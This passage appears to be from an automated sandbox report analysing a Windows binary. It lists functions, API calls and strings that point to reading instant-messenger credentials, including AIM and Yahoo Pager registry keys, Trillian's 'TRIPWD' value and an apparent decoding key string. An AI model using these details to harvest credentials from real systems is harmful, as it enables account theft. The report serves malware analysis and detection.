                                                                                                    • LocalFree.KERNEL32(?,?,00000000,?,?,7661E520,00000000), ref: 0040FDE6
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,7661E520,00000000), ref: 0040FE2F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 2372935584-3916222277
                                                                                                    • Opcode ID: f66a63af9bc6ad28e2805ee69a38c801a35cdaa6f28638d5b3a381909aedb857
                                                                                                    • Instruction ID: 0b8e4f374d5667c45180376da1c8b12cffb8e3ff2062487e5a08cff45f7818d2
                                                                                                    • Opcode Fuzzy Hash: f66a63af9bc6ad28e2805ee69a38c801a35cdaa6f28638d5b3a381909aedb857
                                                                                                    • Instruction Fuzzy Hash: 6B414CB2900209ABCF21DF95D940ADEBBF8AF48304F10407BE915B7291D774AA44CFA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408D47, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                    • String ID: 0$6
                                                                                                    • API String ID: 2300387033-3849865405
                                                                                                    • Opcode ID: c4cc32d9f86e60e61665d107887000d313b636c57177f5370dd8caf8ca2e51bb
                                                                                                    • Instruction ID: e6c6313dcb9b7a471bbfbaa7ec765517bc0a4c64eff5ea5afbcc667e6a019d72
                                                                                                    • Opcode Fuzzy Hash: c4cc32d9f86e60e61665d107887000d313b636c57177f5370dd8caf8ca2e51bb
                                                                                                    • Instruction Fuzzy Hash: DD21BF71408384AFD7118F11D881A9BB7E8FF85348F044A3FF584A62D0EB39D944CB9A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407034, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 59stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memcpystrlen$memsetsprintf
                                                                                                    • String ID: %s (%s)
                                                                                                    • API String ID: 3756086014-1363028141
                                                                                                    • Opcode ID: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
                                                                                                    • Instruction ID: a198fb7af375a94c8e27cd288863d28c10177bb58caa4549e63a683f86c2f09a
                                                                                                    • Opcode Fuzzy Hash: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
                                                                                                    • Instruction Fuzzy Hash: 93114FB2800158BBDB21DF69DC45BDABBBCEF01309F0005AAE644B7101D775AB55CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406DCD, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _mbscat$memsetsprintf
                                                                                                    • String ID: %2.2X
                                                                                                    • API String ID: 125969286-791839006
                                                                                                    • Opcode ID: 2a8733490f50d4093b983ca8d1f50ec72e55e73e138ed9e783ee61cb0d8a9bf3
                                                                                                    • Instruction ID: 5142681b0c0ad1f2d34765b6081944bd4f79e84a169991ad97d052608da76018
                                                                                                    • Opcode Fuzzy Hash: 2a8733490f50d4093b983ca8d1f50ec72e55e73e138ed9e783ee61cb0d8a9bf3
                                                                                                    • Instruction Fuzzy Hash: 82012872A0431466D7225A26DC43BEB77AC9B44B05F10007FFC45B51C1FABC96C447D8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040496D, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$_mbscat
                                                                                                    • String ID: eK@$memcpy$msvcrt.dll
                                                                                                    • API String ID: 2404237207-527332992
                                                                                                    • Opcode ID: 9354cc07b54c0733da4c2861e88293eeaaf788545539071674b28918bacbf150
                                                                                                    • Instruction ID: ade7c94f42c2b1d8f6f4d02d55b8563967db19c46ba0ec0bd93feed85f1333d3
                                                                                                    • Opcode Fuzzy Hash: 9354cc07b54c0733da4c2861e88293eeaaf788545539071674b28918bacbf150
                                                                                                    • Instruction Fuzzy Hash: 7701001144DBC089E372D7289549B97AEE51B22608F48098DD1C647A83D2AAB65CC3BA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041212C, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                    • RegCloseKey.ADVAPI32(0040D439,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412167
                                                                                                    • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412178
                                                                                                    • _mbscat.MSVCRT ref: 00412188
                                                                                                      • Part of subcall function 00411D82: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                                                                                    Strings
                                                                                                    • :\Program Files, xrefs: 0041217E
                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00412137
                                                                                                    • ProgramFilesDir, xrefs: 00412150
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: CloseDirectoryOpenQueryValueWindows_mbscat
                                                                                                    • String ID: :\Program Files$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                                                                    • API String ID: 3464146404-1099425022
                                                                                                    • Opcode ID: e9cddbae49c6936b151603412141959aab3e5c022f3d8ee6b822fd87b43eeab7
                                                                                                    • Instruction ID: 662ef04aa31600ef20de70b7cf87d02e8b1ceff17a77a69e12e4cdaece8db846
                                                                                                    • Opcode Fuzzy Hash: e9cddbae49c6936b151603412141959aab3e5c022f3d8ee6b822fd87b43eeab7
                                                                                                    • Instruction Fuzzy Hash: 2DF0E972508300BFE7119754AD07BCA7FE88F04314F20005BF644A0181FAE96EC0C29D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408B7A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00408BA5
                                                                                                    • sprintf.MSVCRT ref: 00408BBA
                                                                                                      • Part of subcall function 00408C31: memset.MSVCRT ref: 00408C55
                                                                                                      • Part of subcall function 00408C31: GetPrivateProfileStringA.KERNEL32(0041E308,0000000A,00417C88,?,00001000,0041E200), ref: 00408C77
                                                                                                      • Part of subcall function 00408C31: _mbscpy.MSVCRT ref: 00408C91
                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00408BE1
                                                                                                    • EnumChildWindows.USER32(?,Function_00008B1D,00000000), ref: 00408BF1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                    • String ID: caption$dialog_%d
                                                                                                    • API String ID: 2923679083-4161923789
                                                                                                    • Opcode ID: c978e5f3a12a1d3306ee320e52636f41f7f8daffb1fc4c3eb51a0652a28ecf73
                                                                                                    • Instruction ID: de831da21bc0203e5008b33b3115c9aeec9d60fef0dfeaee9ccd5ecb51ae2e74
                                                                                                    • Opcode Fuzzy Hash: c978e5f3a12a1d3306ee320e52636f41f7f8daffb1fc4c3eb51a0652a28ecf73
                                                                                                    • Instruction Fuzzy Hash: EEF0C27054034CBAEB129751DC06FD93A686B08B05F0440AABB84B11D1DEB896C08B1D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00411356, Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004107B0,00000000,?), ref: 0041138D
                                                                                                    • memset.MSVCRT ref: 004113EA
                                                                                                    • memset.MSVCRT ref: 004113FC
                                                                                                      • Part of subcall function 00411172: _mbscpy.MSVCRT ref: 00411198
                                                                                                    • memset.MSVCRT ref: 004114E3
                                                                                                    • _mbscpy.MSVCRT ref: 00411508
                                                                                                    • CloseHandle.KERNEL32(?,004107B0,?), ref: 00411552
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 3974772901-0
                                                                                                    • Opcode ID: 745c210aaaa6b85eaae148b780003da6f3cf09640a074c35b8bdb1d56aff2f36
                                                                                                    • Instruction ID: 2b4e81a65471dd6bda77e3e7a539d18b8ecf8660f8cea3ab0205070076e1852f
                                                                                                    • Opcode Fuzzy Hash: 745c210aaaa6b85eaae148b780003da6f3cf09640a074c35b8bdb1d56aff2f36
                                                                                                    • Instruction Fuzzy Hash: 5F511FB1D00218ABDF10DF95DC85ADEBBB9EF48704F0040A6E609A6251D7759FC0CF69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040807D, Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT ref: 00408094
                                                                                                    • memcpy.MSVCRT ref: 004080A3
                                                                                                      • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA
                                                                                                      • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
                                                                                                      • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
                                                                                                      • Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
                                                                                                      • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
                                                                                                    • memset.MSVCRT ref: 00408120
                                                                                                    • strlen.MSVCRT ref: 00408160
                                                                                                    • _mbscpy.MSVCRT ref: 0040817F
                                                                                                    • _mbscpy.MSVCRT ref: 0040818C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset$_mbscpy$strlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2712745786-0
                                                                                                    • Opcode ID: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
                                                                                                    • Instruction ID: bdbe0c05a74f47d21f032104af17620136749afb05b7a30319e2a8bb584ff9b0
                                                                                                    • Opcode Fuzzy Hash: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
                                                                                                    • Instruction Fuzzy Hash: AC3194728001099ACF14EF65DC85BDE77BCAF44304F00446FE549E7181EB74A68A8BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B8FA, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040B91A
                                                                                                      • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
                                                                                                      • Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877
                                                                                                      • Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
                                                                                                      • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
                                                                                                      • Part of subcall function 00407034: memset.MSVCRT ref: 00407055
                                                                                                      • Part of subcall function 00407034: sprintf.MSVCRT ref: 0040707E
                                                                                                      • Part of subcall function 00407034: strlen.MSVCRT ref: 0040708A
                                                                                                      • Part of subcall function 00407034: memcpy.MSVCRT ref: 0040709F
                                                                                                      • Part of subcall function 00407034: strlen.MSVCRT ref: 004070AD
                                                                                                      • Part of subcall function 00407034: memcpy.MSVCRT ref: 004070BD
                                                                                                      • Part of subcall function 00406E60: _mbscpy.MSVCRT ref: 00406EC6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                    • API String ID: 2726666094-3614832568
                                                                                                    • Opcode ID: 48ad67bf17a677834281717159f6163cc093dbae317e4fe0e66c085f04f9eb92
                                                                                                    • Instruction ID: 663635aaa2767a47ae833ce325b1c2bbb94a135e02c7cec880bc1d98f4d47d81
                                                                                                    • Opcode Fuzzy Hash: 48ad67bf17a677834281717159f6163cc093dbae317e4fe0e66c085f04f9eb92
                                                                                                    • Instruction Fuzzy Hash: 8E21EBB5C002189FCB01FFA5DA817DDBBB4AB08708F20417FE549B7286DF381A558B99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406CAA, Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 00406CB5
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00406CC6
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00406CCD
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00406CD5
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00406CE2
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,76914E20), ref: 00406D20
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: CapsDeviceWindow$MoveRectRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 3197862061-0
                                                                                                    • Opcode ID: 46aa025759630b167b55e315cdb859b7672f25e3c69014d30f42312940603d98
                                                                                                    • Instruction ID: 8a34af0b3d0659c25a6c3d8e0783375a2f2358695c0a050eea5ba45bf34a7176
                                                                                                    • Opcode Fuzzy Hash: 46aa025759630b167b55e315cdb859b7672f25e3c69014d30f42312940603d98
                                                                                                    • Instruction Fuzzy Hash: 62118E32A00219EFDB009FB9CD4DEEF7FB8EB84750F054165F905A7250DA70AD01CAA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00403D24, Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403D49
                                                                                                    • memset.MSVCRT ref: 00403D62
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403D79
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403D98
                                                                                                    • strlen.MSVCRT ref: 00403DAA
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403DBB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1786725549-0
                                                                                                    • Opcode ID: 57566774f34a7d6a244140384ef089970c63e573ccff7e860df9a23001c61ee2
                                                                                                    • Instruction ID: 833f6c37e82b16f9b4c34b80bb2ce5ff812abd73926e68a98c8801a8732a43de
                                                                                                    • Opcode Fuzzy Hash: 57566774f34a7d6a244140384ef089970c63e573ccff7e860df9a23001c61ee2
                                                                                                    • Instruction Fuzzy Hash: 2C111BB644122CFEEB119B94DC89EEB77ACEF08354F1041A6B715E2091E6349F448BB8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040F37A, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                                                                                      • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                                                                                    • _strcmpi.MSVCRT ref: 0040F3D1
                                                                                                    • _strcmpi.MSVCRT ref: 0040F3F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi$memcpystrlen
                                                                                                    • String ID: http://www.ebuddy.com$http://www.imvu.com$https://www.google.com
                                                                                                    • API String ID: 2025310588-2353251349
                                                                                                    • Opcode ID: 6aa85cd40264e4eeed6d724107f07241557df926fb76c4270f31d7a56a6e10ff
                                                                                                    • Instruction ID: 147ef2bbec41d1b0b79b570ae49dc02a3b2ea9406cbc79ec07c01e0a249b4c29
                                                                                                    • Opcode Fuzzy Hash: 6aa85cd40264e4eeed6d724107f07241557df926fb76c4270f31d7a56a6e10ff
                                                                                                    • Instruction Fuzzy Hash: 1B11C1B21083409AD330EF25D8457DB77E8EFA4305F10893FE998A2182EB785649875A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00412E4D, Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: d76c6e9bbc824b9e791745045f41857ca1225a75c0f91e99517293dc547767ba
                                                                                                    • Instruction ID: 39cb4549293e6cd4e8f45f1fb6a35693fcb7bd1e2582dcc07fe9920ce8c868a3
                                                                                                    • Opcode Fuzzy Hash: d76c6e9bbc824b9e791745045f41857ca1225a75c0f91e99517293dc547767ba
                                                                                                    • Instruction Fuzzy Hash: 83014F32A0AA3527C6257E2675017CBA3646F05B29F15420FF808B73428B6C7DE046DE
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00413B1D, Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00413B3E
                                                                                                    • memset.MSVCRT ref: 00413B57
                                                                                                    • memset.MSVCRT ref: 00413B6B
                                                                                                      • Part of subcall function 00413646: strlen.MSVCRT ref: 00413653
                                                                                                    • strlen.MSVCRT ref: 00413B87
                                                                                                    • memcpy.MSVCRT ref: 00413BAC
                                                                                                    • memcpy.MSVCRT ref: 00413BC2
                                                                                                      • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA
                                                                                                      • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
                                                                                                      • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
                                                                                                      • Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
                                                                                                      • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
                                                                                                    • memcpy.MSVCRT ref: 00413C02
                                                                                                      • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C96C
                                                                                                      • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C996
                                                                                                      • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA0E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset$strlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2142929671-0
                                                                                                    • Opcode ID: 12c23c21f074b2e82c1811d2f488e6951e7381ea67b5b6e5923544c93fd9d40f
                                                                                                    • Instruction ID: 3b0ef80f5f4f1d26b85f6ed19fc7f93af9089081b0544b1b4270697ce1475561
                                                                                                    • Opcode Fuzzy Hash: 12c23c21f074b2e82c1811d2f488e6951e7381ea67b5b6e5923544c93fd9d40f
                                                                                                    • Instruction Fuzzy Hash: EB512CB290011DAFCB10EF55DC81AEEB7A9BF04309F5445BAE509E7141EB34AF898F94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00402730, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00411D82: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                                                                                    • strtoul.MSVCRT ref: 00402782
                                                                                                    • _mbscpy.MSVCRT ref: 00402807
                                                                                                    • _mbscpy.MSVCRT ref: 00402817
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$QueryValuestrtoul
                                                                                                    • String ID: 3 d5JKNNC,MANSLDJQ32ELK1N4SAIp08$TRIPWD
                                                                                                    • API String ID: 4008679483-1446091703
                                                                                                    • Opcode ID: e02f09f827b7a1402bbcc64ad373729b872f3cbb9493f1593754ca161662a432
                                                                                                    • Instruction ID: 4ca16360b260b82c0f814568f8b1846068da3ba20428fc10580ffdfcf904f702
                                                                                                    • Opcode Fuzzy Hash: e02f09f827b7a1402bbcc64ad373729b872f3cbb9493f1593754ca161662a432
                                                                                                    • Instruction Fuzzy Hash: 2C31E83280424C6EDF01DBB8E941ADFBFB4AF19310F1444AAE944FB191D674AB49CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B2F5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Cursor_mbsicmpqsort
                                                                                                    • String ID: /nosort$/sort
                                                                                                    • API String ID: 882979914-1578091866
                                                                                                    • Opcode ID: aca6ef3a54d3682c88ae91ffd4c16f467d4d6d8ebe203e6f6b8079e39e5b1455
                                                                                                    • Instruction ID: c642ed81bba6fc27793a5d708b6807a860a9cb0bcd27181b40ce8d315371ea34
                                                                                                    • Opcode Fuzzy Hash: aca6ef3a54d3682c88ae91ffd4c16f467d4d6d8ebe203e6f6b8079e39e5b1455
                                                                                                    • Instruction Fuzzy Hash: 3721A231600200DFDB05EF25C8C1E9577A9EF85728F2400BAFD19AF2D2CB79A841CB69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040C427, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$DeleteIconLoadObject
                                                                                                    • String ID: ;@
                                                                                                    • API String ID: 1986663749-2925476404
                                                                                                    • Opcode ID: aac6870d61330ff5dfa6fb924a5771f84dfd7bc32999be728c9d3dbb0e26c9e2
                                                                                                    • Instruction ID: 4d16bad446557b49ffcede9a37569aa771c04751a2fd478bf3dc9e82e5d405e4
                                                                                                    • Opcode Fuzzy Hash: aac6870d61330ff5dfa6fb924a5771f84dfd7bc32999be728c9d3dbb0e26c9e2
                                                                                                    • Instruction Fuzzy Hash: A921AE70900314CBCB50AF6698846D97BA8BB01714F9886BFEC0DAF286CF7855408F68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00413735, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 55registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00413757
                                                                                                      • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                      • Part of subcall function 00411D82: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,000003FF,?,00000000), ref: 004137BF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValuememset
                                                                                                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                    • API String ID: 1830152886-1703613266
                                                                                                    • Opcode ID: 0237e653f74925a001417010736f5cc4d8aa8eddb031e6596643e2c9a8a80dd1
                                                                                                    • Instruction ID: 02697a5e3e6c6c3f452774ad5988b122dd70f79e91add571e9a1c89a2d7602b2
                                                                                                    • Opcode Fuzzy Hash: 0237e653f74925a001417010736f5cc4d8aa8eddb031e6596643e2c9a8a80dd1
                                                                                                    • Instruction Fuzzy Hash: 9301F9B6B00104FFEF106A95AD42ADA7BACDF04315F10406BFE04F3251E675AF8586AC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00412396, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SHGetMalloc.SHELL32(?), ref: 004123A6
                                                                                                    • SHBrowseForFolder.SHELL32(?), ref: 004123D8
                                                                                                    • SHGetPathFromIDList.SHELL32(00000000,?), ref: 004123EC
                                                                                                    • _mbscpy.MSVCRT ref: 004123FF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                    • String ID: [@
                                                                                                    • API String ID: 1479990042-3416412563
                                                                                                    • Opcode ID: 0ed61469ac53670edaa810a2117bfc786e2c3e1837aac1e3952743f7bc219d88
                                                                                                    • Instruction ID: 5ef3e47e4b44953a2dad9ee1bf13406931f922e9c8d23326f6bb0268a582906b
                                                                                                    • Opcode Fuzzy Hash: 0ed61469ac53670edaa810a2117bfc786e2c3e1837aac1e3952743f7bc219d88
                                                                                                    • Instruction Fuzzy Hash: 5F11FAB5900218EFCB00DFA9D984AEEBBF8EB49314B10406AE905E7200D779DE45CB64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408C31, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00408C55
                                                                                                    • GetPrivateProfileStringA.KERNEL32(0041E308,0000000A,00417C88,?,00001000,0041E200), ref: 00408C77
                                                                                                    • _mbscpy.MSVCRT ref: 00408C91
                                                                                                    Strings
                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408C3E
                                                                                                    • ?@, xrefs: 00408C31
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString_mbscpymemset
                                                                                                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$?@
                                                                                                    • API String ID: 408644273-2377969721
